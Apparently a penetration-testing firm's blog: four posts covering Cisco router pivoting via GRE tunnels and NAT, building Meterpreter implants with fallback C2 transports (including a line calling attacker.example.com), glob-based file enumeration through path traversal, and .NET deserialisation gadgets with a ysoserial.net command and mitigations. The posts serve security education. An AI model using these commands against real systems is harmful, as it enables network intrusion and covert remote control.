
Cisco Pivoting for Penetration Testers

Updated: Jul 21, 2020

On a recent engagement we faced a difficult target with minimal external attack surface. Their website had a few flaws, but it was hosted externally with a third party. Even if we could compromise the site, it likely wouldn’t result in the internal network access we were searching for.

Thanks to Shodan, we identified a Cisco router which was externally-accessible. This is a rundown of how we leveraged this device into a full network compromise.

 

Disclaimer: This information would probably be nothing new for Cisco gurus or someone with a CCNA; but hopefully this post grants some security folk out there enough knowledge to turn a router compromise into internal shells in the future. As always, take extreme care when dealing with any critical network infrastructure.

 

The Router

 

Having identified a router which belonged to the target, we performed the typical enumeration we complete on every device: port scans, default password checks, SNMP checks, etc. Fortunately for us, the router had its read-only SNMP community string set to the default “public”, and its read-write community string set to the default “private”. With access to the read-write string, tools such as Metasploit’s scanner/snmp/cisco_config_tftp module can be used to pull down the running configuration, or more specifically, the hashes of the passwords being used on the device. The three-letter password was not particularly resilient to cracking, and within a few minutes we were on the router with full permissions.

 

Great, we have access to the router – now what? We dug into the pivoting methods available to penetration testers who find themselves on a Cisco device. Unfortunately for us, there was very little information out there addressing the particular constraints we faced on this engagement.

 

The Network

 

What we had done so far looked similar to the above picture. We had compromised the router via its external interface (100.200.100.200) and had pulled down its configuration file. The internal LAN was reachable via one of the router’s interfaces, which had the address 192.168.1.3 on the 192.168.1.0/24 subnet. There were further complications and interfaces, but they aren’t relevant to the process we went through. One of our biggest hurdles was the configuration of the internal network. Clients were being assigned an IP address by an internal router located at 192.168.1.1, which was also their default gateway for any outbound traffic. The significance of this will come into play shortly.

 

Failed Attempts

 

The initial naive plan was to simply port-forward a connection from the external interface through to the internal LAN, resulting in quick-and-dirty access to specific services and allowing us to obtain shells before tearing down the now-obsolete port forward. This would be a simple command on the Cisco router to perform static Network Address Translation (static NAT). We’ll get into actual commands in the successful attempts section, but this would essentially be saying to the Cisco device, “When you receive an incoming packet on 100.200.100.200:30000, always translate this to the IP address and port 192.168.1.40:3389 and forward it on via the internal interface.” With luck, the RDP service on 192.168.1.40 would respond, the packet would be forwarded back out via 192.168.1.3, we’d enter some stolen credentials and success! Unfortunately for us this didn’t happen.
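
For reference, the kind of static NAT rule we had in mind is a one-liner on IOS. The following is only a sketch; it assumes ip nat inside and ip nat outside had already been assigned to the LAN and WAN interfaces in the usual way:

// On the Cisco device
ip nat inside source static tcp 192.168.1.40 3389 100.200.100.200 30000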

 

As you may have guessed from our earlier description, the problem was that the packets were not in fact coming back to 192.168.1.3. Because the source address (our external IP, 50.50.50.50) was outside of their subnet, the internal hosts were instead sending their replies via the default gateway (192.168.1.1) to try to reach our IP! To this day I don’t know why the 192.168.1.1 device couldn’t route externally. As with most security work, curve balls like this create interesting problems that people don’t usually see. The correct solution to this routing issue would be “reconfigure the gateway to allow routing out to our IP address”, but as we didn’t control that device it wasn’t an option. A pictorial version of our problem is represented below.

 

Okay, so at the router, we’re translating the destination address to be on the internal LAN, but that leaves us with an “invalid” source address for the purposes of routing. We can’t change the router to do source address translation instead of destination address translation, because we’d then have no way of getting packets to the correct IP address (you can’t just set a route on your own computer saying the gateway for 192.168.1.0/24 is 100.200.100.200: the routers across the internet would not know how to honour your 192.168.1.40 destination IP). What we need is some form of double NAT; that is, packets should exit the router with both the source and destination addresses translated. So, how do you do double NAT on a Cisco 1841? The answer is not in the first 40 pages of Google results – trust me, I looked. It appears that this is possible on Cisco ASA devices, but not on a Cisco 1841. I attempted all manner of loopbacks, forwarding rules, NAT chains, etc. with no luck. I could not get the Cisco device to translate both source and destination IP addresses. If anyone knows how to do this on a Cisco 1841, I’d love to hear from you.

 

Our Saviour – Generic Routing Encapsulation (GRE)

 

GRE is a protocol that wraps up other traffic and tunnels it through to a designated endpoint. Think of it as similar to a VPN in some ways. The key point is that this sorts out our “destination” address problem: we can set the destination to be an address in the target LAN’s 192.168.1.0/24 range, and tell the tunnel to “take care of the rest” in terms of getting the traffic to the target Cisco router. Anyway, enough theory, here are the commands. Here we set up a GRE tunnel on the subnet 172.16.0.0/24, assigning the Cisco device 172.16.0.1, and our device 172.16.0.3:

// On the attacking machine
modprobe ip_gre
iptunnel add mynet mode gre remote <target external ip> local <attacker external ip> ttl 255
ip addr add 172.16.0.3/24 dev mynet
ifconfig mynet up
route add -net 172.16.0.0 netmask 255.255.255.0 dev mynet

// On the Cisco device
config term
interface Tunnel0
ip address 172.16.0.1 255.255.255.0
ip mtu 1514
ip virtual-reassembly
tunnel source <Interface of WAN on the Cisco>
tunnel destination <Attacking Machine IP> 
 

After these commands are run on both devices, you should be able to ping 172.16.0.1 from your attacking machine, and ping 172.16.0.3 from the Cisco router. We have effectively created the following picture.

 

 

NAT – New and Improved

 

We’re not quite out of the woods yet. If we examine the traffic path, we still have our return address problem (pictured below). The key step we have taken, however, is that we’re no longer using up our “one” NAT rule on the Cisco 1841 just to get the initial destination address into a form that is workable for us. Revisiting our original port forwarding idea, we could continue to add ad hoc static NAT rules; but we’re not going to go through all this effort to address one port at a time. There has to be a better way.

 
 

Enter Dynamic NAT. This is more commonly seen in a typical home setup, where you have multiple devices behind your router and you’re “NATing” your traffic out, presenting one public IP address to the internet at large. When you consider it that way, it’s almost exactly what we want to do in this situation, except that the “internet at large” is actually our target LAN. If we perform this type of NAT, then as far as the target computers are concerned, the traffic source is 192.168.1.3, and they will return traffic to that IP address. The NAT table on the Cisco router remembers which incoming traffic produced that specific source IP / port combination, and maps the replies back to our 172.16.0.3 address appropriately. Again, this is the same thing your home router does when receiving traffic back from the internet after you make a web request. Another key point: because the source address is translated to 192.168.1.3, it falls within the target LAN’s subnet. As a result, hosts reply to it directly and ignore the 192.168.1.1 gateway which was giving us problems in the past!

Again, enough theory, what are the commands?

 
// On the Cisco Device
config term
interface Tunnel0
ip nat inside          
interface <Internal Lan Interface>
ip nat outside
exit
config term
access-list client-list permit ip 172.16.0.0 0.0.255.255         
ip nat enable       	 
ip nat source route-map test interface <Internal LAN Interface> overload
ip nat inside source list client-list interface <Internal LAN Interface> overload 
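
One extra step on the attacking machine is easy to forget: traffic destined for the internal LAN also has to be sent down the tunnel. Depending on how your routes ended up, this may or may not be strictly necessary, but it is something along the lines of:

// On the attacking machine
ip route add 192.168.1.0/24 dev mynet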
 

Success! With this configuration it is now possible to route traffic to the internal network from our attacking machine over the GRE tunnel. The entire 192.168.1.0/24 range is reachable from our attacking machine, and no special proxytunnel-style program is needed to access it. A final picture shows what the setup looks like. Hopefully this saves you the time it took me to figure it out!

 

Happy Hacking – Peleus


Multiple Transports in a Meterpreter Payload

Updated: Jul 21, 2020

It’s no secret that we’re big fans of the Metasploit Framework for red-team operations. Every now and again, we come across a unique problem and think “Wouldn’t it be great if Metasploit could do X?”

 

Often, after some investigation, it turns out that it is actually possible! But unfortunately, some of these great features haven’t had the attention they deserve. We hope this post will correct that for one feature that made our life much easier on a recent engagement.

 

Once Meterpreter shellcode has been run, whether from a phish or some other means, it will reach out to the attacker’s Command and Control (C2) server over some network transport, such as HTTP, HTTPS or TCP. However, in an unknown environment, a successful connection is not guaranteed: firewalls, proxies, or intrusion prevention systems might all prevent a certain transport method from reaching out to the public Internet.

Repeated trial and error is sometimes possible, but not always. For a phish, clicks come at a premium. Some exploits only give you one shot to get a shell, before crashing the host process. Wouldn’t it be great if you could send a Meterpreter payload with multiple fallback communication options? (Spoiler: you can, though it’s a bit fiddly)

 

Transports

 

Before we get there, let’s take a step back. Meterpreter has the ability to have multiple “transports” in a single implant. A transport is the method by which it communicates to the Metasploit C2 server: TCP, HTTP, etc. Typically, Meterpreter is deployed with a single transport, having had the payload type set in msfvenom or in a Metasploit exploit module (e.g. meterpreter_reverse_http).

But after a connection has been made between the implant and the C2 server, an operator can add additional, backup transports. This is particularly useful for redundancy: if one path goes down (e.g. your domain becomes blacklisted), it can fall back to another.

A transport is defined by its properties:

  • The type of transport (TCP, HTTP, etc.)

  • The host to connect to

  • The port to connect on

  • A URI, for HTTP-based transports

  • Other properties such as retry times and timeouts

Once a Meterpreter session has been set up, you can add a transport using the command transport add and providing it with parameters (type transport to see the options).
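
For example, from an established session, adding a fallback HTTPS transport looks something like this (attacker.example.com is a placeholder, and the transport help output is the authority on option names for your Metasploit version):

transport add -t reverse_https -l attacker.example.com -p 443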

 

Extension Initialisation Scripts

 

Meterpreter also has the concept of “extensions” which contain the vast majority of Meterpreter’s functionality. By default, the stdapi  extension (containing the most basic functionality of Meterpreter) is loaded during session initialisation. Other extensions, such as Kiwi (Mimikatz), PowerShell, or Incognito, can be added dynamically at runtime by using the load command.

 

When creating stageless payloads, msfvenom allows extensions to be pre-loaded, so rather than having to send them across the wire after session initialisation, they are already set up and ready to go. You can do this with the extensions parameter.

 

One neat feature which we think hasn’t gotten nearly enough attention is the ability to run a script inside the PowerShell and Python extensions, if they have been included in a stageless payload. The script, if included, is run after all of the extensions are loaded, but before the first communication attempt.

 

This provides the ability to add extra transports to the Meterpreter implant before it has even called back to the C2. It is made much easier by the provided PowerShell bindings for this functionality: the Add-TcpTransport and Add-WebTransport functions.

 

This is extremely useful in situations where the state of the target’s network is unknown: perhaps an HTTPS transport will work, or maybe it’ll be blocked, or the proxy situation will cause it to fail. Maybe TCP will work on port 3389. By setting up multiple transports in this initialisation script, Meterpreter will try each of them (for a configurable amount of time) before moving on to the next one.

 

To do this:

  • Create a stageless meterpreter payload, which pre-loads the PowerShell extension. The transport used on the command line will be the default

  • Include a PowerShell script as an “Extension Initialisation Script” (parameter name is extinit, and has the format of <extension name>,<absolute file path>). This script should add additional transports to the Meterpreter session.

  • When the shellcode runs, this script will also run

  • If the initial transport (the one specified on the command line) fails, Meterpreter will then try each of these alternative transports in turn

 

The command line for this would be:

msfvenom -p windows/meterpreter_reverse_tcp lhost=<host> lport=<port> sessionretrytotal=30 sessionretrywait=10 extensions=stdapi,priv,powershell extinit=powershell,/home/ionize/AddTransports.ps1 -f exe 

Then, in AddTransports.ps1 :

Add-TcpTransport -lhost <host> -lport <port> -RetryWait 10 -RetryTotal 30
Add-WebTransport -Url http(s)://<host>:<port>/<luri> -RetryWait 10 -RetryTotal 30
 

Some gotchas to be aware of:

  • Make sure the extinit parameter contains the full, absolute path to the script (relative paths don’t appear to work)

  • Ensure you configure how long to try each transport before moving on to the next.

  • RetryWait is the time to wait between each attempt to contact the C2 server

  • RetryTotal is the total amount of time to wait before moving on to the next transport

  • Note that the parameter names for retry times and timeouts are different between the PowerShell bindings and the Metasploit parameters themselves: in the PowerShell extension, they are RetryWait and RetryTotal; in Metasploit they are SessionRetryWait and SessionRetryTotal (a tad confusing, as they relate to transports, not sessions)

 

Huge thanks to @TheColonial for implementing this feature, and for helping us figure out how to use it.


Taking Local File Disclosure to the Next Level

I recently discovered a path traversal vulnerability in a bash script exposed through the cgi-bin directory on an Apache server. Using the vulnerability, I was able to read arbitrary files on the remote system (as long as the Apache user had permission to read them).

 

This allowed me to download known files to better understand the target. I poked around the /etc and /var/log/ directories, grabbing select files such as passwd, httpd.conf, access_log and error_log. This revealed the operating system to be SunOS 5.10 (which is the same as Solaris 10), a list of users, the web root, and exact names of various files within the web root.

 

One of the limitations of a file disclosure vulnerability is that you need to know the exact name of the file you want to read. This is fine for reading well-known files that should always exist, such as /etc/passwd; but to read many of the more interesting files, some investigation and educated guessing needs to be done.

 

Sometimes the information gleaned from reading a well-known file can be helpful in finding other useful files. For example, by reading /etc/passwd, a list of valid usernames can be found. From that, I checked all users’ home directories for poorly-protected SSH private keys (id_rsa). In addition, we were able to steal some of the source code of the application, using filenames discovered within the Apache logs.

 

Analyzing the source code showed no command injection vulnerabilities or otherwise potentially-dangerous functionality such as arbitrary file writes.

 

I wanted the ability to list directory contents and perform a more in-depth search on the target. A little-known method that I discovered during OSCP is the ability to download the locatedb (/var/cache/locate/locatedb) or mlocate.db (/var/lib/mlocate/mlocate.db) files. You can then inspect the downloaded database using the locate command to find files on the target. It turns out that SunOS 5.10 does not have the locate command, and consequently the locate databases were not present.

 

Since the vulnerability was occurring through a Bash script, globbing was being performed on the path. Globbing is essentially wildcard matching on pathnames. The two examples below will both print the contents of /etc/passwd. The question mark matches any single character, and the square brackets match any one of the characters listed inside them.

cat /???/????wd
cat /???/[opqrstuvwxyz]????d 

This is useful because it gives us the ability to read files, even if we don’t know their exact name. This can be achieved by continually appending the ? symbol to a pathname. Once you match a valid file the contents should be returned. Example:

/var/apache2/cgi-bin/?
/var/apache2/cgi-bin/??
/var/apache2/cgi-bin/???
/var/apache2/cgi-bin/????
 

Depending on the behavior of the local file disclosure, matching multiple files might break the application. In our case, if the globbing matched multiple files, no data was returned. However, I was able to differentiate between zero matches, one match and multiple matches with the response returning an error message, the file contents or nothing, respectively. In the case of the pattern matching multiple files, the bracket wildcard was used to drill down to a single file:

 
/var/apache2/cgi-bin/?????
/var/apache2/cgi-bin/[abcdefghijklmno]????
/var/apache2/cgi-bin/[jklmno]????
/var/apache2/cgi-bin/[mno]????
/var/apache2/cgi-bin/[o]????
/var/apache2/cgi-bin/o[abcdefghijklmno]???
 

The example uses a binary search pattern to be efficient. If all you require is the file’s contents, you can safely stop after retrieving each file. The technique can also be used to disclose the full filename, and consequently build up a listing of a directory’s contents. This is especially useful for the cgi-bin, where the full filename is required to execute a script.
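
Continuing the drill-down above with a made-up name (suppose the script eventually turns out to be called order, and note that the a-o guess for the second character at the end of the previous listing would have come back empty), each remaining position is resolved the same way until only literal characters are left:

/var/apache2/cgi-bin/o[pqrstuvwxyz]???
/var/apache2/cgi-bin/o[rst]???
/var/apache2/cgi-bin/o[r]???
/var/apache2/cgi-bin/or[abcdefg]??
/var/apache2/cgi-bin/or[d]??
/var/apache2/cgi-bin/ord[e]?
/var/apache2/cgi-bin/orde[r]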

 

This would be painful by hand, so I created a tool to automate the process. I was now able to download the remaining source code, search home directories for credentials left in cleartext, check the temp folder for anything suspicious, view Samba shares, etc. I never ended up compromising the target, but it was an excellent learning process.


Deserialisation Vulnerabilities

Updated: Jul 21, 2020

Seemingly one of the most overlooked security vulnerabilities in the web applications that we test is the deserialisation of untrusted data. I say overlooked because awareness of this issue seems to be comparatively low among web developers. Contrast that with the severity of this class of vulnerability (an attacker running arbitrary code on your web server), and the fact that it is present in the most common modern web application frameworks (.NET and Java), and you have a dangerous situation. OWASP recently recognised this, moving it into their Top 10 Most Critical Web Application Security Risks.

If you are deserialising any data; whether that be through JSON, XML, or Binary deserialisation, there is a chance that your code is vulnerable to this type of attack.

The dangers of deserialisation in the .NET framework in particular have only recently been demonstrated, with practical attacks having been publicised just last year. Examples in this article will largely refer to .NET code, but the principles apply to many languages; especially Java. This is not intended to be a comprehensive review of all possible attacks, as the subject is quite deep; but it will help to catch the vast majority of the issues we see.

So what is this vulnerability?

Deserialisation is the process of turning a stream of bytes into a fully-formed object in a computer’s memory. It makes the job of a programmer much simpler: rather than spending effort parsing complicated data structures, we just let the framework handle it for us!

One aspect of deserialisation that is important to understand, from the point of view of both functionality and security, is that simply filling in an object’s internal properties may not be sufficient to reconstruct it. Some code may have to run to complete the process: think of hooking up internal references to sub-objects or global objects, or ensuring that data is normalised. In .NET, for example, this is done using the OnDeserialized and OnDeserializing attributes, as well as OnDeserialization callbacks.
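
To make that concrete, here is a purely hypothetical .NET class (CacheEntry is our own illustration, not a real framework type) showing a deserialisation callback running against field values that came straight from the serialised stream:

using System;
using System.IO;
using System.Runtime.Serialization;

[Serializable]
public class CacheEntry
{
    // Filled in directly from the serialised stream; attacker-controlled
    // if that stream came from an untrusted source.
    public string BackingFilePath;

    [NonSerialized]
    private FileStream _handle;

    // Runs automatically once the fields above have been populated,
    // before the caller ever sees the reconstructed object.
    [OnDeserialized]
    private void Reconnect(StreamingContext context)
    {
        _handle = File.OpenRead(BackingFilePath);
    }
}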

The big problem with deserialisation arises when an attacker can coerce another system to deserialise an object of an unexpected type. If the code doing the deserialising trusts whatever type it receives, that’s where things start to go south. Take the following code for example:

Vulnerable deserialisation code:

byte[] value = `user-controlled data`;
MemoryStream memoryStream = new MemoryStream(value);
var formatter = new BinaryFormatter();
MyType deserialized = (MyType)formatter.Deserialize(memoryStream); // Cast the object to the expected type
deserialized.SomeMethod();

At first glance, it appears as though we’re checking that the serialised object that we receive is of the correct type. We certainly verify it before using the object.

From an attacker’s point of view, however, the code does the following:

  • Receive data from an attacker

  • Determine the type of object that the attacker wants to use

  • Run all the deserialisation callbacks for that type of object, using the data sent by the attacker as parameters

  • Then, a type check is performed, which will fail… but the damage has already been done: we have run the OnDeserialized method of an unexpected type!

  • Then, eventually, run the object’s finaliser (upon being cleaned up by the garbage collector)

 

But what’s the big problem with that? An attacker can’t just create their own type and send it over the wire to be deserialised. However, what if there were a built-in type which could be leveraged to perform some malicious action?

Well, security researchers have found just that: various types built in to their respective frameworks (.NET, Java, etc.) which, upon being deserialised, can be leveraged to perform malicious actions, including executing arbitrary code on the server. Even if the code immediately checks “Was this the expected type?” (as in the above example), the damage has already been done by the very act of deserialising.

Take, for example, the .NET type SortedSet.
Upon deserialisation, a SortedSet needs to make sure that it is indeed sorted; otherwise its internal state would essentially be corrupted. So, in its deserialisation callback, the SortedSet class calls its sorting function to make sure everything’s as it should be.

To allow programmers the flexibility to sort items according to their own business rules, the SortedSet class allows the programmer to set an alternative sorting function, as long as it is a method that receives two parameters of the expected type. So an attacker can send a malicious payload that does the following:

  1. Create a SortedSet<string> object that contains two values, say for example “cmd” and “/c ping 127.0.0.1”

  2. Configure the SortedSet  to use the method Process.Start(string process, string arguments) to “sort” its entries. This method, while not being used for its intended purpose, technically meets the criteria above: it’s a method that takes two strings as parameters.

  3. Serialise the SortedSet, and send it to the vulnerable system.

Upon being deserialised, in its callback, the vulnerable system will attempt to “sort” the set by calling Process.Start("cmd", "/c ping 127.0.0.1") which will in turn run an arbitrary command (in this case, a ping command). The thread will immediately throw an exception because Process.Start returns an unexpected type… but again, the damage has already been done, as the command is already running in a separate process.

This clever hack was discovered by James Forshaw of Google Project Zero. Check out his original blog post for a more technical explanation.

The GitHub project ysoserial.net contains a list of other “gadgets” that can be used for code execution in .NET, and will create payloads to exploit vulnerable code. Some of these gadgets have been patched by Microsoft, but the majority are difficult to fix, as they would require breaking changes to the Framework. They are thus still currently available to attackers, despite having been public for over a year.
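
As an illustration of how low the bar is for an attacker, generating a payload with ysoserial.net is a one-liner. The exact flags below are from memory, so treat this as indicative and check the project’s README, but it is along the lines of:

ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 -c "ping 127.0.0.1"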

The Jackson deserialisation library for Java has taken a more aggressive approach, accepting breaking changes: as researchers find gadgets that can be used for code execution, those types are added to a “blacklist” and prevented from being deserialised. This is somewhat of a “whack-a-mole” approach: it complicates exploitation of code that is already vulnerable, but it should by no means be relied upon to prevent newly-discovered attacks. Known Java deserialisation attacks can be found in the ysoserial GitHub project.

It’s alright, I’m encrypting the serialised data

Cryptography is hard. Even modern ciphers such as AES can be used in an insecure way. We often find incorrectly-implemented cryptography in the websites we test, allowing us to read the protected data, and sometimes to inject our own. Or perhaps the encryption key is sitting in a file that an attacker might be able to read through a file disclosure attack, or a temporary server misconfiguration. If you are relying on cryptography as your only protection mechanism against this attack, you’re living dangerously close to the edge.

What can I do about it?

Quite often, deserialisation is just the wrong design pattern, especially for web applications. This is especially true when serialised objects are passed between the client and server to maintain state. Removing the attack surface completely by never accepting serialised objects from the user is often the safest and most correct solution.

If you insist upon using deserialisation, though, how can you avoid this vulnerability? The core problem for deserialisation attacks is that, by controlling the type of an object, an attacker is able to run code that was not intended to be run as part of the vulnerable program. As a result, a developer must configure the deserialiser to check the type of the serialised object before deserialising.

Different deserialisers behave differently in this respect, so it bears going through the main ones that are used:

 

.NET

 

A review of .NET deserialisation mechanisms was performed by Alvaro Muñoz and Oleksandr Mirosh for the 2017 Black Hat conference, and their whitepaper contains detailed information about all of the major deserialisation libraries in .NET. By way of summary:

If you are using the BinaryFormatter type to deserialise, you are almost certainly vulnerable to this attack, as your code will by default just deserialise whatever type an attacker wants it to. Our advice is to never use this class with untrusted data at all; however you can configure BinaryFormatter to be more secure by restricting the valid deserialised types using the SerializationBinder class.
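
If you do end up keeping BinaryFormatter, a minimal sketch of that binder approach might look like the following (reusing the MyType placeholder from the earlier snippet; adapt the allow-list to your own expected types):

using System;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;

// Allow-list binder: refuse to resolve any type we do not explicitly expect.
sealed class StrictBinder : SerializationBinder
{
    public override Type BindToType(string assemblyName, string typeName)
    {
        if (typeName == typeof(MyType).FullName)
            return typeof(MyType);
        throw new SerializationException("Unexpected type in stream: " + typeName);
    }
}

// At the deserialisation site:
var formatter = new BinaryFormatter { Binder = new StrictBinder() };
MyType deserialized = (MyType)formatter.Deserialize(memoryStream);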

 

If you are using Newtonsoft’s Json.Net deserialiser, this is secure-by-default; but it can be accidentally configured to be vulnerable. Specifically, before deserialising an object, the serialised type will be checked to ensure it is the same as the expected type, thus removing an attacker’s ability to control the type of an object. However, a developer may wish to allow subclasses of an expected type, and may configure deserialisation to be polymorphism-friendly by setting the TypeNameHandling property to have a value other than None. As soon as this is done, a door is opened for an attacker: if any deserialised field, either in the parent object, or in some sub-object, is of type System.Object, an attacker will now be allowed to place whatever type they wish into that field, including one of the unsafe code-execution “gadgets”.
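
To make the difference concrete, a short illustration (a sketch only: json stands in for attacker-supplied input, and MyType is again just a placeholder):

using Newtonsoft.Json;

// Secure by default: the target type is fixed at compile time,
// so the sender cannot choose what gets instantiated.
MyType safe = JsonConvert.DeserializeObject<MyType>(json);

// Dangerous: honouring embedded "$type" metadata lets the sender influence
// which types get instantiated (see the object-typed field caveat above).
MyType risky = JsonConvert.DeserializeObject<MyType>(json,
    new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.All });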

XmlSerializer is even harder to make vulnerable, but it has been known to happen. When it is constructed with a fixed, statically-known expected type, XmlSerializer will prevent arbitrary types from being used, at the expense of some flexibility for the developer. However, if a program’s code sets the expected deserialisation type dynamically (say, by inspecting the XML and resolving the expected type using reflection), an attacker once again has control over the type that will be deserialised. Using XmlSerializer with a static expected type is secure.
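
A sketch of the two situations (MyType is a placeholder, xmlStream stands in for the incoming data, and attackerControlledTypeName represents any type name derived from the request):

using System;
using System.IO;
using System.Xml.Serialization;

// Safe: the expected type is fixed when the serialiser is constructed.
var safeSerialiser = new XmlSerializer(typeof(MyType));
MyType expected = (MyType)safeSerialiser.Deserialize(xmlStream);

// Risky: the expected type is resolved from data the attacker influences,
// so the attacker once again controls what gets deserialised.
var riskySerialiser = new XmlSerializer(Type.GetType(attackerControlledTypeName));
object whoKnows = riskySerialiser.Deserialize(xmlStream);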

Most other built-in .NET deserialisation libraries use BinaryFormatter or XmlSerializer internally, and would thus inherit their security properties. Other 3rd-party deserialisation libraries also exist, and Muñoz and Mirosh’s paper examines some of them.

 

Java

 

The ObjectInputStream.readObject method will deserialise whatever serialised Java object it is given, making it comparable to .NET’s BinaryFormatter class in both its flexibility and its attack surface.

 

The Jackson JSON deserialiser has a similar attack surface to Json.Net, in that it is secure by default; but by enabling polymorphic behaviour through the ObjectMapper.enableDefaultTyping() method, arbitrary subclasses may be created.

 

The bottom line

 

Deserialisation is a highly flexible and convenient tool for developers… which unfortunately means it’s also highly flexible and convenient for hackers. If you’re deserialising data anywhere in your code, make sure you consider the security implications… or better yet, don’t use deserialisation at all, if you can avoid it. And if you’re a developer, there’s nothing quite like performing this attack on your own code, to give yourself a better understanding of the risks.
